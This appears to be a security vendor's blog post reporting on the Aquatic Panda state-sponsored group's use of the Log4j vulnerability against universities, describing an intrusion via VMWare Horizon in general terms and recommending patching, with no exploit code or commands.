Why are hackers targeting universities and colleges? Academic institutions function as common targets because systems are vulnerable and the data is valuable.

As of July 2021, academic groups saw an average of 6,956 cyber attacks per month, a 29% increase over the prior year’s numbers.

Presently, the Aquatic Panda advanced persistent threat group (APT) is leveraging the Log4j vulnerabilities to access proprietary information owned by academic institutions.

Did you miss the Log4j coverage? Click here.

What we know

The Aquatic Panda group first appeared online in 2012. According to researchers, Aquatic Panda operators aim to collect intelligence and to engage in espionage. The group’s specific objectives remain unknown.

Up until this point, Aquatic Panda has primarily targeted telecommunications groups, technology firms, and government entities. Operators rely extensively on Cobalt Strike. Previous tools used in operations also include Gh0st RAT, Poison Ivy, and Torn RAT.

Why it matters

Aquatic Panda is state-sponsored and uses strategies that allow persistence in environments. This sets the stage for continuous theft of valuable data. It also enables the threat actors to spend days, weeks or months mapping out vulnerabilities and planning for a more lucrative and disruptive attack. Attack clean-up isn’t easy and can cost organizations millions of budget dollars.

Log4j details

Researchers recently observed suspicious activity stemming from a specific process on a vulnerable VMWare Horizon instance. The network belonged to a large academic institution. The activities ultimately resulted in an active intrusion.

After tracking the APT actor’s operations and examining available telemetry, researchers disclosed that a modified version of the Log4j exploit was likely used amidst operations.

Technical insights

Researchers report that Aquatic Panda members leveraged a public GitHub project starting on December 13th of this year to gain access into the vulnerable instance of VMWare Horizon. The Aquatic Panda group continued reconnaissance from the host while using native OS binaries to explore exiting privilege levels, system details and domain information.

As researchers continued to trace Aquatic Panda’s behaviors, they observed use of a Base64-encoded command via PowerShell used to obtain malware from toolkits. While the attack unfolded, experts provided regular updates to the victim organization. The target implemented its incident response protocol as quickly as possible. Eventually, patching of a vulnerable application prevented further intruder activity.

In conclusion

Across the world, a series of threat actors are exploiting the Log4j vulnerabilities for criminal gain. At least a handful of experts expect to see continued threat actor use of Log4j until all organizations apply comprehensive mitigations.

For its part, Apache has just issued another security update for the Log4j logging library. As of Tuesday, the latest version of Log4j available for install on systems running Java 8 is 2.17.1. This represents the fifth vulnerability discovered since December 9th. Given all of the attention on this library, this may or may not be the final update pertaining to Log4j vulnerabilities.

To learn more about managing cyber risk in a changing world, please join us at the premiere cyber security event of the year – CPX 360 2022. Register here.